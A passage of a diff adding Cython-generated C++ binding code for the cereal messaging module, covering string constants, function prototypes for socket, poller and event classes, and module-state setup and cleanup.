__pyx_k_PubSocket___reduce_cython[] = "PubSocket.__reduce_cython__"; +static const char __pyx_k_SubSocket___reduce_cython[] = "SubSocket.__reduce_cython__"; +static const char __pyx_k_PubSocket___setstate_cython[] = "PubSocket.__setstate_cython__"; +static const char __pyx_k_SubSocket___setstate_cython[] = "SubSocket.__setstate_cython__"; +static const char __pyx_k_PubSocket_all_readers_updated[] = "PubSocket.all_readers_updated"; +static const char __pyx_k_cereal_messaging_messaging_pyx[] = "cereal.messaging.messaging_pyx"; +static const char __pyx_k_SocketEventHandle___reduce_cytho[] = "SocketEventHandle.__reduce_cython__"; +static const char __pyx_k_SocketEventHandle___setstate_cyt[] = "SocketEventHandle.__setstate_cython__"; +static const char __pyx_k_cereal_messaging_messaging_pyx_p[] = "cereal/messaging/messaging_pyx.pyx"; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +/* #### Code section: decls ### */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_14MessagingError___init__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self, PyObject *__pyx_v_endpoint); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_toggle_fake_events(CYTHON_UNUSED PyObject *__pyx_self, bool __pyx_v_enabled); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_2set_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self, std::string __pyx_v_prefix); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_4get_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6delete_fake_prefix(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_8wait_for_one_event(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_events, int __pyx_v_timeout); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_5Event___cinit__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2set(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_4clear(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_6wait(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self, int __pyx_v_timeout); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_8peek(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_2fd___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_3ptr___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_5Event_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, std::string __pyx_v_endpoint, std::string __pyx_v_identifier, bool __pyx_v_override); /* proto */ +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_2__set__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, bool __pyx_v_value); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event___get__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_2term(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self); /* proto */ +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_4__dealloc__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_6__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_7Context_8__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self); /* proto */ +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_4registerSocket(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_socket); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_6poll(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, PyObject *__pyx_v_timeout); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_8__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_6Poller_10__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Poller *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self); /* proto */ +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_4connect(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context, std::string __pyx_v_endpoint, std::string __pyx_v_address, bool __pyx_v_conflate); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_6setTimeout(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, int __pyx_v_timeout); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_8receive(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, bool __pyx_v_non_blocking); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket___cinit__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self); /* proto */ +static void __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_2__dealloc__(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_4connect(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context *__pyx_v_context, std::string __pyx_v_endpoint); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_6send(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, PyObject *__pyx_v_data); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_8all_readers_updated(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Event(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SocketEventHandle(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Context(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Poller(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SubSocket(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_PubSocket(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_Event; + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle; + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_Context; + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_Poller; + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket; + PyObject *__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket; + #endif + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event; + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle; + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context; + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller; + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket; + PyTypeObject *__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket; + PyObject *__pyx_kp_b_; + PyObject *__pyx_kp_u_; + PyObject *__pyx_kp_b_127_0_0_1; + PyObject *__pyx_n_s_Context; + PyObject *__pyx_n_s_Context___reduce_cython; + PyObject *__pyx_n_s_Context___setstate_cython; + PyObject *__pyx_n_s_Context_term; + PyObject *__pyx_n_s_Event; + PyObject *__pyx_n_s_Event___reduce_cython; + PyObject *__pyx_n_s_Event___setstate_cython; + PyObject *__pyx_n_s_Event_clear; + PyObject *__pyx_n_s_Event_peek; + PyObject *__pyx_n_s_Event_set; + PyObject *__pyx_n_s_Event_wait; + PyObject *__pyx_n_s_MessagingError; + PyObject *__pyx_n_s_MessagingError___init; + PyObject *__pyx_kp_u_Messaging_failure; + PyObject *__pyx_n_s_MultiplePublishersError; + PyObject *__pyx_kp_u_None; + PyObject *__pyx_n_s_Poller; + PyObject *__pyx_n_s_Poller___reduce_cython; + PyObject *__pyx_n_s_Poller___setstate_cython; + PyObject *__pyx_n_s_Poller_poll; + PyObject *__pyx_n_s_Poller_registerSocket; + PyObject *__pyx_n_s_PubSocket; + PyObject *__pyx_n_s_PubSocket___reduce_cython; + PyObject *__pyx_n_s_PubSocket___setstate_cython; + PyObject *__pyx_n_s_PubSocket_all_readers_updated; + PyObject *__pyx_n_s_PubSocket_connect; + PyObject *__pyx_n_s_PubSocket_send; + PyObject *__pyx_kp_u_SIGINT_received_exiting; + PyObject *__pyx_n_s_SocketEventHandle; + PyObject *__pyx_n_s_SocketEventHandle___reduce_cytho; + PyObject *__pyx_n_s_SocketEventHandle___setstate_cyt; + PyObject *__pyx_n_s_SubSocket; + PyObject *__pyx_n_s_SubSocket___reduce_cython; + PyObject *__pyx_n_s_SubSocket___setstate_cython; + PyObject *__pyx_n_s_SubSocket_connect; + PyObject *__pyx_n_s_SubSocket_receive; + PyObject *__pyx_n_s_SubSocket_setTimeout; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_n_s__5; + PyObject *__pyx_n_s__53; + PyObject *__pyx_n_s_address; + PyObject *__pyx_n_s_all_readers_updated; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_cereal_messaging_messaging_pyx; + PyObject *__pyx_kp_s_cereal_messaging_messaging_pyx_p; + PyObject *__pyx_n_s_clear; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_conflate; + PyObject *__pyx_n_s_connect; + PyObject *__pyx_n_s_context; + PyObject *__pyx_n_s_data; + PyObject *__pyx_n_s_decode; + PyObject *__pyx_n_s_delete_fake_prefix; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_doc; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_enabled; + PyObject *__pyx_n_s_endpoint; + PyObject *__pyx_n_s_event; + PyObject *__pyx_n_s_events; + PyObject *__pyx_n_s_exit; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_get_fake_prefix; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_identifier; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_init; + PyObject *__pyx_n_s_init_subclass; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_items; + PyObject *__pyx_n_s_length; + PyObject *__pyx_n_s_m; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_message; + PyObject *__pyx_n_s_metaclass; + PyObject *__pyx_n_s_module; + PyObject *__pyx_n_s_mro_entries; + PyObject *__pyx_n_s_msg; + PyObject *__pyx_n_s_name; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_non_blocking; + PyObject *__pyx_n_s_override; + PyObject *__pyx_n_s_peek; + PyObject *__pyx_n_s_poll; + PyObject *__pyx_n_s_prefix; + PyObject *__pyx_n_s_prepare; + PyObject *__pyx_n_s_print; + PyObject *__pyx_n_s_ptr; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_vtable; + PyObject *__pyx_n_s_qualname; + PyObject *__pyx_n_s_r; + PyObject *__pyx_n_s_receive; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_registerSocket; + PyObject *__pyx_n_s_result; + PyObject *__pyx_n_s_s; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_send; + PyObject *__pyx_n_s_set; + PyObject *__pyx_n_s_setTimeout; + PyObject *__pyx_n_s_set_fake_prefix; + PyObject *__pyx_n_s_set_name; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_socket; + PyObject *__pyx_n_s_sockets; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_suffix; + PyObject *__pyx_n_s_super; + PyObject *__pyx_n_s_sys; + PyObject *__pyx_n_s_sz; + PyObject *__pyx_n_s_t; + PyObject *__pyx_n_s_term; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_timeout; + PyObject *__pyx_n_s_toggle_fake_events; + PyObject *__pyx_kp_u_utf_8; + PyObject *__pyx_n_s_wait; + PyObject *__pyx_n_s_wait_for_one_event; + PyObject *__pyx_kp_u_with; + PyObject *__pyx_int_1; + PyObject *__pyx_int_neg_1; + std::string __pyx_k__3; + PyObject *__pyx_tuple__4; + PyObject *__pyx_tuple__6; + PyObject *__pyx_tuple__8; + PyObject *__pyx_tuple__9; + PyObject *__pyx_tuple__11; + PyObject *__pyx_tuple__15; + PyObject *__pyx_tuple__17; + PyObject *__pyx_tuple__20; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__25; + PyObject *__pyx_tuple__32; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__41; + PyObject *__pyx_tuple__43; + PyObject *__pyx_tuple__46; + PyObject *__pyx_tuple__48; + PyObject *__pyx_codeobj__7; + PyObject *__pyx_codeobj__10; + PyObject *__pyx_codeobj__12; + PyObject *__pyx_codeobj__13; + PyObject *__pyx_codeobj__14; + PyObject *__pyx_codeobj__16; + PyObject *__pyx_codeobj__18; + PyObject *__pyx_codeobj__19; + PyObject *__pyx_codeobj__21; + PyObject *__pyx_codeobj__23; + PyObject *__pyx_codeobj__24; + PyObject *__pyx_codeobj__26; + PyObject *__pyx_codeobj__27; + PyObject *__pyx_codeobj__28; + PyObject *__pyx_codeobj__29; + PyObject *__pyx_codeobj__30; + PyObject *__pyx_codeobj__31; + PyObject *__pyx_codeobj__33; + PyObject *__pyx_codeobj__35; + PyObject *__pyx_codeobj__36; + PyObject *__pyx_codeobj__37; + PyObject *__pyx_codeobj__39; + PyObject *__pyx_codeobj__40; + PyObject *__pyx_codeobj__42; + PyObject *__pyx_codeobj__44; + PyObject *__pyx_codeobj__45; + PyObject *__pyx_codeobj__47; + PyObject *__pyx_codeobj__49; + PyObject *__pyx_codeobj__50; + PyObject *__pyx_codeobj__51; + PyObject *__pyx_codeobj__52; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Event); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Event); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SocketEventHandle); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Context); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Context); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_Poller); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_Poller); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_SubSocket); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_SubSocket); + Py_CLEAR(clear_module_state->__pyx_ptype_6cereal_9messaging_13messaging_pyx_PubSocket); + Py_CLEAR(clear_module_state->__pyx_type_6cereal_9messaging_13messaging_pyx_PubSocket); + Py_CLEAR(clear_module_state->__pyx_kp_b_); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_kp_b_127_0_0_1); + Py_CLEAR(clear_module_state->__pyx_n_s_Context); + Py_CLEAR(clear_module_state->__pyx_n_s_Context___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Context___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Context_term); + Py_CLEAR(clear_module_state->__pyx_n_s_Event); + Py_CLEAR(clear_module_state->__pyx_n_s_Event___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Event___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Event_clear); + Py_CLEAR(clear_module_state->__pyx_n_s_Event_peek); + Py_CLEAR(clear_module_state->__pyx_n_s_Event_set); + Py_CLEAR(clear_module_state->__pyx_n_s_Event_wait); + Py_CLEAR(clear_module_state->__pyx_n_s_MessagingError); + Py_CLEAR(clear_module_state->__pyx_n_s_MessagingError___init); + Py_CLEAR(clear_module_state->__pyx_kp_u_Messaging_failure); + Py_CLEAR(clear_module_state->__pyx_n_s_MultiplePublishersError); + Py_CLEAR(clear_module_state->__pyx_kp_u_None); + Py_CLEAR(clear_module_state->__pyx_n_s_Poller); + Py_CLEAR(clear_module_state->__pyx_n_s_Poller___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Poller___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Poller_poll); + Py_CLEAR(clear_module_state->__pyx_n_s_Poller_registerSocket); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket_all_readers_updated); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket_connect); + Py_CLEAR(clear_module_state->__pyx_n_s_PubSocket_send); + Py_CLEAR(clear_module_state->__pyx_kp_u_SIGINT_received_exiting); + Py_CLEAR(clear_module_state->__pyx_n_s_SocketEventHandle); + Py_CLEAR(clear_module_state->__pyx_n_s_SocketEventHandle___reduce_cytho); + Py_CLEAR(clear_module_state->__pyx_n_s_SocketEventHandle___setstate_cyt); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket_connect); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket_receive); + Py_CLEAR(clear_module_state->__pyx_n_s_SubSocket_setTimeout); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_kp_u__2); + Py_CLEAR(clear_module_state->__pyx_n_s__5); + Py_CLEAR(clear_module_state->__pyx_n_s__53); + Py_CLEAR(clear_module_state->__pyx_n_s_address); + Py_CLEAR(clear_module_state->__pyx_n_s_all_readers_updated); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_cereal_messaging_messaging_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_cereal_messaging_messaging_pyx_p); + Py_CLEAR(clear_module_state->__pyx_n_s_clear); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_conflate); + Py_CLEAR(clear_module_state->__pyx_n_s_connect); + Py_CLEAR(clear_module_state->__pyx_n_s_context); + Py_CLEAR(clear_module_state->__pyx_n_s_data); + Py_CLEAR(clear_module_state->__pyx_n_s_decode); + Py_CLEAR(clear_module_state->__pyx_n_s_delete_fake_prefix); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_doc); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_enabled); + Py_CLEAR(clear_module_state->__pyx_n_s_endpoint); + Py_CLEAR(clear_module_state->__pyx_n_s_event); + Py_CLEAR(clear_module_state->__pyx_n_s_events); + Py_CLEAR(clear_module_state->__pyx_n_s_exit); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_get_fake_prefix); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_identifier); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_init); + Py_CLEAR(clear_module_state->__pyx_n_s_init_subclass); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_items); + Py_CLEAR(clear_module_state->__pyx_n_s_length); + Py_CLEAR(clear_module_state->__pyx_n_s_m); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_message); + Py_CLEAR(clear_module_state->__pyx_n_s_metaclass); + Py_CLEAR(clear_module_state->__pyx_n_s_module); + Py_CLEAR(clear_module_state->__pyx_n_s_mro_entries); + Py_CLEAR(clear_module_state->__pyx_n_s_msg); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_non_blocking); + Py_CLEAR(clear_module_state->__pyx_n_s_override); + Py_CLEAR(clear_module_state->__pyx_n_s_peek); + 